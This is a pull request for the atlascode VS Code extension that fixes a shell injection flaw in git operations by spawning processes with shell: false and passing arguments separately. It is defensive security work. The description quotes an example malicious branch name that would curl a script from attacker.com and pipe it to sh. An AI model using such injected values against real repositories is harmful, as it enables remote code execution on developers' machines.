### PR TITLE
[VULN-1825192] Fix remote code execution via malicious git branch name

### DIFF
--- a/CHANGELOG.md
+++ b/CHANGELOG.md
@@ -1,10 +1,12 @@
 ### [Report an Issue](https://github.com/atlassian/atlascode/issues)
 
+## What's new in 4.0.30
+
+### Bug Fixes
+
+- Fixed shell command injection vulnerability (VULN-1825192) in git operations. The `Shell` utility class now uses `shell: false` when spawning processes, and all git commands pass arguments as separate array elements rather than interpolating user-controlled values (e.g. branch names, file paths, commit hashes) directly into shell command strings. This prevents Remote Code Execution via maliciously crafted git branch names.
+
 ## What's new in 4.0.29
-
-### Security Fixes
-
-- **Security**: Fixed shell command injection vulnerability (VULN-1825192) in git operations. The `Shell` utility class now uses `shell: false` when spawning processes, and all git commands pass arguments as separate array elements rather than interpolating user-controlled values (e.g. branch names, file paths, commit hashes) directly into shell command strings. This prevents Remote Code Execution via maliciously crafted git branch names.
 
 ### Improvements
 
@@ -27,7 +29,6 @@
 
 - **Webview**: Fixed `ChunkLoadError` for CSS chunks (e.g. `atlascodeRovoDev`, `compiled-css`) when running with a Firefox-based webview engine (e.g. code-server). Switched from `MiniCssExtractPlugin` to `style-loader` in the React webpack bundles so CSS is injected as `<style>` tags instead of being dynamically fetched as separate files, which Firefox cannot do for `vscode-resource` URLs.
 - **RovoDev**: Fixed rate limit exceeded message showing a literal `{title}` placeholder instead of the actual credit type title
-
 
 ## What's new in 4.0.27
 
@@ -65,7 +66,6 @@
 ### Features
 
 - **RovoDev**: Added copy code button within the Rovo Dev chat for code blocks in the chat.
-
 
 ## What's new in 4.0.23
 

--- a/CHANGELOG.md
+++ b/CHANGELOG.md
@@ -2,6 +2,10 @@
 
 ## What's new in 4.0.29
 
+### Security Fixes
+
+- **Security**: Fixed shell command injection vulnerability (VULN-1825192) in git operations. The `Shell` utility class now uses `shell: false` when spawning processes, and all git commands pass arguments as separate array elements rather than interpolating user-controlled values (e.g. branch names, file paths, commit hashes) directly into shell command strings. This prevents Remote Code Execution via maliciously crafted git branch names.
+
 ### Improvements
 
 - **RovoDev**: Updated Rovo Dev version to 202605.14.1

--- a/src/codebucket/backend/backend.test.ts
+++ b/src/codebucket/backend/backend.test.ts
@@ -268,7 +268,15 @@ describe('Backend', () => {
             const result = await backend.findSelectedRevision('src/file.ts', 5);
 
             expect(result).toBe('abc123def456');
-            expect(mockShellInstance.output).toHaveBeenCalledWith('git blame --root -l -L 5,5 src/file.ts');
+            expect(mockShellInstance.output).toHaveBeenCalledWith(
+                'git',
+                'blame',
+                '--root',
+                '-l',
+                '-L5,5',
+                '--',
+                'src/file.ts',
+            );
         });
 
         it('should throw error when git blame output is invalid', async () => {

--- a/src/codebucket/backend/backend.ts
+++ b/src/codebucket/backend/backend.ts
@@ -65,7 +65,7 @@ export class Backend {
      * Get the hash of the revision associated with the current line.
      */
     public async findSelectedRevision(file: string, line: number): Promise<string> {
-        const output = await this.shell.output(`git blame --root -l -L ${line},${line} ${file}`);
+        const output = await this.shell.output('git', 'blame', '--root', '-l', `-L${line},${line}`, '--', file);
         const match = output.match(/^(\w+)/);
         if (match) {
             return match[1];

--- a/src/codebucket/command/command-base.test.ts
+++ b/src/codebucket/command/command-base.test.ts
@@ -159,7 +159,7 @@ describe('CommandBase', () => {
 
             expect(result).toBeDefined();
             expect(Shell).toHaveBeenCalledWith('/test/project/src');
-            expect(mockShell.exec).toHaveBeenCalledWith('git rev-parse --show-toplevel');
+            expect(mockShell.exec).toHaveBeenCalledWith('git', 'rev-parse', '--show-toplevel');
         });
 
         it('should throw error when no git repository is found', async () => {

--- a/src/codebucket/command/command-base.ts
+++ b/src/codebucket/command/command-base.ts
@@ -35,7 +35,7 @@ export abstract class CommandBase {
         const workingDirectory = this.getDirectory();
         const shell = new Shell(workingDirectory);
         for (const backend of [Backend]) {
-            const { code, stdout } = await shell.exec(backend.root);
+            const { code, stdout } = await shell.exec('git', 'rev-parse', '--show-toplevel');
             if (code === 0) {
                 return new backend(stdout.trim());
             }

--- a/src/util/shell.ts
+++ b/src/util/shell.ts
@@ -9,11 +9,18 @@ export interface Result {
 export class Shell {
     constructor(private readonly workingDirectory: string) {}
 
+    /**
+     * Execute a command with arguments safely, without spawning a shell.
+     * Arguments are passed directly to the process, preventing shell injection attacks.
+     *
+     * @param command - The executable to run (e.g. 'git')
+     * @param args - Arguments passed directly to the process (not interpreted by a shell)
+     */
     public async exec(command: string, ...args: string[]): Promise<Result> {
         return new Promise<Result>((resolve, reject) => {
             const proc = spawn(command, args, {
                 cwd: this.workingDirectory,
-                shell: true,
+                shell: false,
             });
 
             let stdout = '';

--- a/src/webview/pullrequest/vscCreatePullRequestActionImpl.ts
+++ b/src/webview/pullrequest/vscCreatePullRequestActionImpl.ts
@@ -130,7 +130,11 @@ export class VSCCreatePullRequestActionApi implements CreatePullRequestActionApi
 
         const shell = new Shell(Uri.parse(wsRepo.rootUri).fsPath);
         const diff = await shell.output(
-            `git log --format=${this.commitFormat} ${destinationBranch.name}..${sourceBranchName} -z`,
+            'git',
+            'log',
+            `--format=${this.commitFormat}`,
+            `${destinationBranch.name}..${sourceBranchName}`,
+            '-z',
         );
         const gitCommits = this.parseGitCommits(diff);
 
@@ -222,7 +226,15 @@ export class VSCCreatePullRequestActionApi implements CreatePullRequestActionApi
         //Using git diff --numstat will generate lines in the format '{lines added}      {lines removed}     {name of file}'
         //We want to seperate each line and extract this data so we can create a file diff
         //NOTE: the '-M50' flag will cause git to detect any added/deleted file combo as a rename if they're 50% similar
-        const numstatLines = await shell.lines(`git diff --numstat -C -M50 ${forkPoint} ${sourceBranch.commit}`);
+        const numstatLines = await shell.lines(
+            'git',
+            'diff',
+            '--numstat',
+            '-C',
+            '-M50',
+            forkPoint,
+            sourceBranch.commit!,
+        );
 
         if (numstatLines.length === 0) {
             return [];
@@ -231,7 +243,15 @@ export class VSCCreatePullRequestActionApi implements CreatePullRequestActionApi
         //The bitbucket website also provides a status for each file (modified, added, deleted, etc.), so we need to get this info too.
         //git diff-index --name-status will return lines in the form {status}        {name of file}
         //It's important to note that the order of the files will be identical to git diff --numstat, and we can use that to our advantage
-        const namestatusLines = await shell.lines(`git diff --name-status -C -M50 ${forkPoint} ${sourceBranch.commit}`);
+        const namestatusLines = await shell.lines(
+            'git',
+            'diff',
+            '--name-status',
+            '-C',
+            '-M50',
+            forkPoint,
+            sourceBranch.commit!,
+        );
         const fileDiffs: FileDiff[] = [];
         for (let i = 0; i < numstatLines.length; i++) {
             const numstatWords = numstatLines[i].split(/\s+/);


### PR DESCRIPTION
### Fix shell command injection vulnerability (VULN-1825192)

Changes Shell.exec to use shell: false when spawning processes, and updates all git command invocations to pass arguments as separate array elements instead of interpolating user-controlled values (branch names, file paths, commit hashes) into command strings.

**Why**: With shell: true, a maliciously crafted git branch name like feature$(curl attacker.com/shell.sh|sh) would be interpreted by /bin/sh, allowing Remote Code Execution on the victim’s machine. With shell: false, all arguments are passed directly to the git executable — shell metacharacters are treated as literals and never interpreted.






<!-- Rovo Dev code review status -->
---
Rovo Dev code review: <strong>Rovo Dev is reviewing this pull request…</strong>
Refresh the page in a few minutes to see the results.
<!-- /Rovo Dev code review status -->

